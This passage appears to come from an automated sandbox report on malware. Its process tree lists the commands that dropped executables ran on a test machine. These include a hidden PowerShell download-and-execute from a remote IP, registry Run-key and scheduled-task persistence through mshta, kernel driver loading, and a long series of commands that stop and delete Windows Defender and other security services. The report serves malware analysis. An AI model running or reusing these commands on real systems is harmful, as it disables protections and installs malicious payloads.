        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2268
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
        
        "PowerShell.exe" -NoProfile -NonInteractive -Command -
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2568
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:472
    - - C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"
        5⤵
        
        PID:5416
      - C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        6⤵
        
        PID:4192
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        7⤵
        
        PID:3516
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        8⤵
        
        PID:2536
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        9⤵
        
        PID:5180
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        10⤵
        
        PID:3868
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        11⤵
        
        PID:4168
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        12⤵
        
        PID:4268
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        13⤵
        
        PID:5348
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        14⤵
        
        PID:4892
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        15⤵
        
        PID:2300
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        16⤵
        
        PID:1356
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        17⤵
        
        PID:1452
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        18⤵
        
        PID:4368
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        19⤵
        
        PID:1512
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        20⤵
        
        PID:5880
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        21⤵
        
        PID:3760
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        22⤵
        
        PID:5760
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        23⤵
        
        PID:5996
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        24⤵
        
        PID:5108
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        25⤵
        
        PID:5560
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        26⤵
        
        PID:1672
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        27⤵
        
        PID:4844
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        28⤵
        
        PID:3380
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        29⤵
        
        PID:552
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        30⤵
        
        PID:4196
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        31⤵
        
        PID:5288
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        32⤵
        
        PID:4824
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        33⤵
        
        PID:3968
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        34⤵
        
        PID:1236
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        35⤵
        
        PID:3516
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        36⤵
        
        PID:2536
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        37⤵
        
        PID:4132
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        38⤵
        
        PID:4808
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        39⤵
        
        PID:2120
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        40⤵
        
        PID:4984
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        41⤵
        
        PID:3608
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        42⤵
        
        PID:2300
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        43⤵
        
        PID:2940
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        44⤵
        
        PID:5312
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        45⤵
        
        PID:5740
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        46⤵
        
        PID:4208
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        47⤵
        
        PID:4916
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        48⤵
        
        PID:1136
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        49⤵
        
        PID:5928
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        50⤵
        
        PID:4396
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        51⤵
        
        PID:3464
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        52⤵
        
        PID:3880
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        53⤵
        
        PID:5712
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        54⤵
        
        PID:5408
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        55⤵
        
        PID:4044
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        56⤵
        
        PID:3480
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        57⤵
        
        PID:1236
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        58⤵
        
        PID:4020
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        59⤵
        
        PID:4504
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        60⤵
        
        PID:5240
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        61⤵
        
        PID:2780
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        62⤵
        
        PID:5984
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        63⤵
        
        PID:5604
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        64⤵
        
        PID:1340
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        65⤵
        
        PID:3844
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        66⤵
        
        PID:5136
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        67⤵
        
        PID:4040
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        68⤵
        
        PID:5604
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        69⤵
        
        PID:2012
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        70⤵
        
        PID:5228
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        71⤵
        
        PID:3196
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        72⤵
        
        PID:624
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        73⤵
        
        PID:6052
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        74⤵
        
        PID:5348
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        75⤵
        
        PID:3844
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        76⤵
        
        PID:4368
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        77⤵
        
        PID:2120
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        78⤵
        
        PID:4856
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javasupport_platform.exe"
        79⤵
        Modifies registry key
        
        PID:3124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javasupport_platform.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe\"'"
        79⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4440
    - - C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe"
        5⤵
        
        PID:1936
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:4724
    - - C:\Users\Admin\AppData\Local\Temp\10043430101\4b0a68fe7c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10043430101\4b0a68fe7c.exe"
        5⤵
        
        PID:3968
      - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10043430101\4b0a68fe7c.exe"
        6⤵
        
        PID:4220
    - - C:\Users\Admin\AppData\Local\Temp\10043440101\a521a65289.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10043440101\a521a65289.exe"
        5⤵
        
        PID:3196
      - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10043440101\a521a65289.exe"
        6⤵
        
        PID:1540
- - C:\Users\Admin\AppData\Local\Temp\10364180101\apple.exe
    "C:\Users\Admin\AppData\Local\Temp\10364180101\apple.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:644
  - - C:\Users\Admin\AppData\Local\Temp\22.exe
      "C:\Users\Admin\AppData\Local\Temp\22.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5148
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9EE.tmp\9EF.tmp\9F0.bat C:\Users\Admin\AppData\Local\Temp\22.exe"
        5⤵
        
        PID:3840
      - C:\Users\Admin\AppData\Local\Temp\22.exe
        
        "C:\Users\Admin\AppData\Local\Temp\22.exe" go
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:472
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B94.tmp\B95.tmp\B96.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"
        7⤵
        Drops file in Program Files directory
        
        PID:5792
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        8⤵
        Launches sc.exe
        
        PID:6136
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        8⤵
        Launches sc.exe
        
        PID:6088
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        Delays execution with timeout.exe
        
        PID:4580
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        8⤵
        Launches sc.exe
        
        PID:2320
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        8⤵
        Launches sc.exe
        
        PID:4632
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:976
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5560
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        8⤵
        Launches sc.exe
        
        PID:5612
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        8⤵
        Launches sc.exe
        
        PID:2648
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        8⤵
        
        PID:5788
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        8⤵
        Launches sc.exe
        
        PID:3880
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        8⤵
        Launches sc.exe
        
        PID:5744
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        8⤵
        
        PID:2648
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        8⤵
        Launches sc.exe
        
        PID:6104
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        8⤵
        Launches sc.exe
        
        PID:4668
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        8⤵
        
        PID:2400
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        8⤵
        Launches sc.exe
        
        PID:4928
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        8⤵
        Launches sc.exe
        
        PID:4364
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        8⤵
        
        PID:3632
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        8⤵
        Launches sc.exe
        
        PID:4544
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        8⤵
        Launches sc.exe
        
        PID:4560
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        8⤵
        Modifies security service
        
        PID:2740
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        8⤵
        Launches sc.exe
        
        PID:5996
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        8⤵
        Launches sc.exe
        
        PID:5788
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        8⤵
        
        PID:2880
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        8⤵
        Launches sc.exe
        
        PID:5096
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        8⤵
        Launches sc.exe
        
        PID:1856
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        8⤵
        
        PID:5944
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        8⤵
        Launches sc.exe
        
        PID:5404
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        8⤵
        Launches sc.exe
        
        PID:1060
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        8⤵
        
        PID:5552
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        8⤵
        Launches sc.exe
        
        PID:3604
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        8⤵
        Launches sc.exe
        
        PID:8
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        8⤵
        
        PID:2316
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        8⤵
        Launches sc.exe
        
        PID:3580
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        8⤵
        Launches sc.exe
        
        PID:3244
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        8⤵
        
        PID:560
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        8⤵
        Launches sc.exe
        
        PID:5192
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        8⤵
        Launches sc.exe
        
        PID:3608
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        8⤵
        
        PID:4540
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        8⤵
        Launches sc.exe
        
        PID:2760
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        8⤵
        Launches sc.exe
        
        PID:4268
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        8⤵
        
        PID:3272
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        8⤵
        Launches sc.exe
        
        PID:3924
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        8⤵
        Launches sc.exe
        
        PID:412
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        8⤵
        
        PID:916
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        8⤵
        Launches sc.exe
        
        PID:4524
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        8⤵
        Launches sc.exe
        
        PID:3960
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        8⤵
        
        PID:220
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        8⤵
        Launches sc.exe
        
        PID:1496
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        8⤵
        Launches sc.exe
        
        PID:1640
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        8⤵
        
        PID:2932
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        8⤵
        Launches sc.exe
        
        PID:4044
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        8⤵
        Launches sc.exe
        
        PID:6092
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        8⤵
        
        PID:4928
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        8⤵
        
        PID:3688
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        8⤵
        
        PID:5088
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        8⤵
        
        PID:3216
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        8⤵
        
        PID:4364
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        8⤵
        Launches sc.exe
        
        PID:2756
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        8⤵
        Launches sc.exe
        
        PID:5840
- - C:\Users\Admin\AppData\Local\Temp\10364360101\5aa90d41f5.exe
    "C:\Users\Admin\AppData\Local\Temp\10364360101\5aa90d41f5.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1180
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn BD471maNUkY /tr "mshta C:\Users\Admin\AppData\Local\Temp\9c73aDP0G.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:3660
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn BD471maNUkY /tr "mshta C:\Users\Admin\AppData\Local\Temp\9c73aDP0G.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:5312
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\9c73aDP0G.hta
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      PID:1896
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NXU4DHE3AACKUKPPOKTRV8U7NPCGRFJZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4608
      - C:\Users\Admin\AppData\Local\TempNXU4DHE3AACKUKPPOKTRV8U7NPCGRFJZ.EXE
        
        "C:\Users\Admin\AppData\Local\TempNXU4DHE3AACKUKPPOKTRV8U7NPCGRFJZ.EXE"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5244
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10364370121\am_no.cmd" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5996
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 2
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:2776
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3744
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2280
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4744
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2668
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
      4⤵
      PID:4892
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4208
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn "Wc8Zumaiuj8" /tr "mshta \"C:\Temp\1OU8RphKJ.hta\"" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5820
  - - C:\Windows\SysWOW64\mshta.exe
      mshta "C:\Temp\1OU8RphKJ.hta"
      4⤵
